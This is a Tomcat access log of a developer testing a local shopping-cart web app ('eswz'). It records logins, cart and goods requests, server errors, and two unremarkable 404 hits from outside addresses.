0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:04:34 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:04:34 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 45
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:04:36 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 1674
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:04:36 +0800] "GET /eswz/css/1.css HTTP/1.1" 304 - http-bio-8080-exec-5 29
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:04:36 +0800] "GET /eswz/img/2.jpg HTTP/1.1" 304 - http-bio-8080-exec-2 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:04:36 +0800] "GET /eswz/img/4.jpg HTTP/1.1" 304 - http-bio-8080-exec-6 4
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:04:36 +0800] "GET /eswz/img/9.jpg HTTP/1.1" 304 - http-bio-8080-exec-9 4
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:04:36 +0800] "GET /eswz/img/7.jpg HTTP/1.1" 304 - http-bio-8080-exec-10 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:04:36 +0800] "GET /eswz/img/8.jpg HTTP/1.1" 304 - http-bio-8080-exec-7 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:04:36 +0800] "GET /eswz/img/6.jpg HTTP/1.1" 304 - http-bio-8080-exec-8 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:04:36 +0800] "GET /eswz/img/3.jpg HTTP/1.1" 304 - http-bio-8080-exec-7 4
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:04:36 +0800] "GET /eswz/img/1.jpg HTTP/1.1" 304 - http-bio-8080-exec-4 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:04:36 +0800] "GET /favicon.ico HTTP/1.1" 404 - http-bio-8080-exec-4 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:04:38 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-4 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:04:45 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-4 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:04:46 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-4 31
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:04:47 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 6217 http-bio-8080-exec-4 141
89.248.164.165 - - [20/Nov/2022:14:05:25 +0800] "GET /cache/global/img/gs.gif HTTP/1.1" 404 - http-bio-8080-exec-3 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:06:09 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 6201 http-bio-8080-exec-5 107
127.0.0.1 - - [20/Nov/2022:14:07:39 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4343 http-bio-8080-exec-1 1403
127.0.0.1 - - [20/Nov/2022:14:07:39 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-3 78
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:07:41 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-6 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:07:46 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-8 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:07:47 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-9 36
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:07:48 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5200 http-bio-8080-exec-10 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:07:48 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 28
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:08:16 +0800] "GET /eswz/updateCart?goodsid=2&quantity=2 HTTP/1.1" 500 4113 http-bio-8080-exec-10 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:13:32 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5222 http-bio-8080-exec-5 276
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:13:32 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-5 40
186.33.78.236 - - [20/Nov/2022:14:14:13 +0800] "GET / HTTP/1.1" 404 - http-bio-8080-exec-8 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:23:34 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:23:34 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 46
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:23:35 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 658
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:23:38 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:23:42 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:23:44 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 32
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:23:45 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5222 http-bio-8080-exec-8 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:23:45 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 25
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:23:46 +0800] "GET /eswz/deleteCart?goodsid=8 HTTP/1.1" 500 4113 http-bio-8080-exec-10 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:24:10 +0800] "GET /eswz/deleteCart?goodsid=8 HTTP/1.1" 500 4113 http-bio-8080-exec-2 4
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:24:12 +0800] "GET /eswz/deleteCart?goodsid=8 HTTP/1.1" 500 4113 http-bio-8080-exec-1 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:24:40 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:24:40 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 69
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:24:41 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 1319
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:24:43 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:24:48 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:24:50 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 33
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:24:51 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5231 http-bio-8080-exec-8 720
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:24:51 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 28
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:24:53 +0800] "GET /eswz/deleteGoods?goodsid=8 HTTP/1.1" 500 13746 http-bio-8080-exec-10 66
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:26:16 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:26:16 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 42
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:26:17 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 442
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:26:56 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:27:06 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:27:09 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 34
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:27:11 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5231 http-bio-8080-exec-8 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:27:11 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:27:12 +0800] "GET /eswz/deleteGoods?goodsid=8 HTTP/1.1" 404 1019 http-bio-8080-exec-10 33
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:30:43 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:30:43 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 67
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:30:43 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 567
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:30:46 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:30:51 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:30:52 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 26
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:30:53 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4778 http-bio-8080-exec-8 40
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:30:53 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:30:56 +0800] "GET /eswz/deleteGoods?goodsid=9 HTTP/1.1" 200 68 http-bio-8080-exec-10 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:30:57 +0800] "GET /eswz/ShoppingCart HTTP/1.1" 404 985 http-bio-8080-exec-10 3
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:03 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:04 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 43
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:04 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 681
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:08 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:14 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:15 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 30
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:19 +0800] "GET /eswz/detailGoods?goodsid=6 HTTP/1.1" 200 5305 http-bio-8080-exec-8 20
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:19 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:20 +0800] "GET /eswz/insertCart HTTP/1.1" 200 70 http-bio-8080-exec-10 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:22 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:26 +0800] "GET /eswz/detailGoods?goodsid=1 HTTP/1.1" 200 5048 http-bio-8080-exec-10 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:26 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 25
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:27 +0800] "GET /eswz/insertCart HTTP/1.1" 200 70 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:28 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:30 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5189 http-bio-8080-exec-10 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:30 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:41 +0800] "GET /eswz/deleteGoods?goodsid=1 HTTP/1.1" 200 3901 http-bio-8080-exec-10 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:41 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 25
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:53 +0800] "GET /eswz/deleteGoods?goodsid=1 HTTP/1.1" 200 3901 http-bio-8080-exec-10 5
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:53 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:59 +0800] "GET /eswz/deleteGoods?goodsid=1 HTTP/1.1" 200 3901 http-bio-8080-exec-10 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:33:59 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:34:04 +0800] "GET /eswz/deleteGoods?goodsid=2 HTTP/1.1" 200 3901 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:34:04 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:34:08 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4336 http-bio-8080-exec-10 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:34:08 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 16
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:21 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:21 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 47
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:22 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 736
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:24 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:29 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:30 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 29
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:31 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4336 http-bio-8080-exec-8 25
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:31 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 20
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:33 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:35 +0800] "GET /eswz/detailGoods?goodsid=9 HTTP/1.1" 200 5278 http-bio-8080-exec-10 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:35 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:36 +0800] "GET /eswz/insertCart HTTP/1.1" 200 70 http-bio-8080-exec-10 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:37 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:39 +0800] "GET /eswz/detailGoods?goodsid=3 HTTP/1.1" 200 5051 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:39 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 20
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:41 +0800] "GET /eswz/insertCart HTTP/1.1" 200 70 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:42 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:44 +0800] "GET /eswz/detailGoods?goodsid=6 HTTP/1.1" 200 5305 http-bio-8080-exec-10 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:44 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:47 +0800] "GET /eswz/insertCart HTTP/1.1" 200 70 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:48 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:50 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5673 http-bio-8080-exec-10 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:35:50 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:36:03 +0800] "GET /eswz/deleteGoods?goodsid=6 HTTP/1.1" 500 5047 http-bio-8080-exec-10 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:42:03 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:42:03 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 36
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:42:04 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 829
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:42:05 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:42:12 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:42:13 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 30
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:42:14 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5673 http-bio-8080-exec-8 27
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:42:14 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:42:17 +0800] "GET /eswz/deleteGoods?goodsid=6 HTTP/1.1" 200 - http-bio-8080-exec-10 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:42:23 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4793 http-bio-8080-exec-10 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:42:23 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:42:26 +0800] "GET /eswz/deleteGoods?goodsid=9 HTTP/1.1" 200 46 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:42:30 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4344 http-bio-8080-exec-10 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:42:30 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:43:57 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:43:57 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 54
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:43:58 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 658
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:44:01 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:44:06 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:44:08 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 27
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:44:09 +0800] "GET /eswz/detailGoods?goodsid=9 HTTP/1.1" 200 5278 http-bio-8080-exec-8 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:44:09 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:44:10 +0800] "GET /eswz/insertCart HTTP/1.1" 200 70 http-bio-8080-exec-10 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:44:11 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:44:13 +0800] "GET /eswz/detailGoods?goodsid=8 HTTP/1.1" 200 4905 http-bio-8080-exec-10 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:44:13 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 26
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:44:14 +0800] "GET /eswz/insertCart HTTP/1.1" 200 70 http-bio-8080-exec-10 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:44:15 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:44:16 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5246 http-bio-8080-exec-10 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:44:16 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:44:18 +0800] "GET /eswz/deleteGoods?goodsid=3 HTTP/1.1" 200 63 http-bio-8080-exec-10 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:44:19 +0800] "GET /eswz/getCart HTTP/1.1" 500 5047 http-bio-8080-exec-10 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:49:19 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:49:19 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 43
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:49:20 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 789
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:49:23 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:49:30 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:49:31 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 25
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:49:32 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4805 http-bio-8080-exec-8 20
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:49:32 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:49:34 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4805 http-bio-8080-exec-10 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:49:34 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 20
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:49:34 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4805 http-bio-8080-exec-10 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:49:34 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:49:35 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4805 http-bio-8080-exec-10 5
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:49:35 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-6 20
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:49:36 +0800] "GET /eswz/deleteGoods?goodsid=9 HTTP/1.1" 302 - http-bio-8080-exec-6 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:49:36 +0800] "GET /eswz/getCart?userid4 HTTP/1.1" 500 5047 http-bio-8080-exec-6 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:51:45 +0800] "GET /eswz/deleteGoods?goodsid=8 HTTP/1.1" 302 - http-bio-8080-exec-1 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:51:45 +0800] "GET /eswz/getCart?userid4 HTTP/1.1" 500 5047 http-bio-8080-exec-1 3
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:51:55 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 3901 http-bio-8080-exec-3 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:51:55 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-3 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:51:59 +0800] "GET /eswz/detailGoods?goodsid=4 HTTP/1.1" 200 5039 http-bio-8080-exec-3 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:51:59 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-3 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:00 +0800] "GET /eswz/insertCart HTTP/1.1" 200 70 http-bio-8080-exec-3 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:02 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-3 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:20 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:20 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 51
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:21 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 805
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:22 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:26 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:28 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 36
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:30 +0800] "GET /eswz/detailGoods?goodsid=3 HTTP/1.1" 200 5051 http-bio-8080-exec-8 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:30 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:31 +0800] "GET /eswz/insertCart HTTP/1.1" 200 70 http-bio-8080-exec-10 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:32 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:34 +0800] "GET /eswz/detailGoods?goodsid=6 HTTP/1.1" 200 5305 http-bio-8080-exec-10 15
